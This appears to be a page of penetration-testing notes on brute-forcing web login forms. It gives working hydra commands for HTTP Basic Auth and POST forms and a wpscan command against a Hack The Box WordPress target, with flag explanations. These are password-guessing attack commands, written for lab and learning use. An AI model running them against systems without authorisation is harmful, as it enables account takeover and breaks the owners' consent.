Brute Forcing Web Forms

Usually used to attack a login form

HTTP Basic Auth

Bruteforce HTTP Basic Auth

hydra -L users.lst -P passwords.txt -f www.site.org http-head /path/of/target/ -V

Flags:

-V: verbose mode
-f: exit after the first login pair is found

HTTP POST

Bruteforcing HTTP POST form:

hydra http-form-post "login_path:form_username_name=^USER^&form_password_name=^PASS^:failed_login_text" -l username -P passwords_wordlist.txt -t 10

Options:

login_path: The URL of the login form, e.g /login.php.
form_username_name: The "name" variable of the username input field of the form.
form_password_name: The "name" variable of the password input field of the form.
failed_login_text: Text which indicates to Hydra that the login failed, for example "Invalid Credentials."
username: The username of the user you want to brute force.

Flags:

-t: The number of threads.
-l: Specifies the username of the user to brute force.
-L: Specifies a wordlist of usernames to brute force.
-P: Specifies a wordlist of passwords to brute force.

Example use where a failed login redirected to a page with a ?error=1 GET parameter:

hydra 192.168.101.10 http-form-post "/index.php?module=Users&action=Login:__vtrftk=sid%3A9db267cda06a381fdff01c51a36d2362551c82c2%2C1527426288&username=^USER^&password=^PASS^:error=1" -P /usr/share/wordlists/rockyou.txt -t 64 -l admin

Brute forcing WordPress logins using WPScan:

wpscan --url https://brainfuck.htb --passwords /home/x90slide/resources/SecLists/Passwords/Leaked-Databases/rockyou.txt --usernames admin,orestis --disable-tls-checks

PreviousJWT Attacks NextLoose Comparisons

Last updated 4 years ago

hashtagHTTP Basic Auth

hashtagHTTP POST

hashtagWordPress login

HTTP Basic Auth

HTTP POST

WordPress login